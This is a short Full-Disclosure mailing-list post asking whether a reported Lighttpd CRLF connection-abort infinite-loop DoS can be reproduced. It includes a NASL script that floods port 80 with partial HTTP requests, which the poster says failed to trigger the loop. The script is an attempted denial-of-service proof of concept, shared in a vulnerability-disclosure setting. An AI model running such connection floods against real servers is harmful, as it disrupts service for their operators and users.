> Robert Jakabosky discovered an infinite loop triggered by a connection
> abort when Lighttpd processes carriage return and line feed sequences.

Could anybody reproduce this DoS?
I tried this NASL script without success. The server rejects connections for about one minute (because of kazillions of sockets in TIME_WAIT), but it only affects the attacking source IP and I could not launch any CPU loop.

$ more /tmp/ec.nasl
i = 0;
while (s = open_sock_tcp(80))
{
  i ++;
  send(socket: s, data: 'GET / HTTP/1.0\r\n');
  close(s);
}
display(i, ' done\n');
$

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/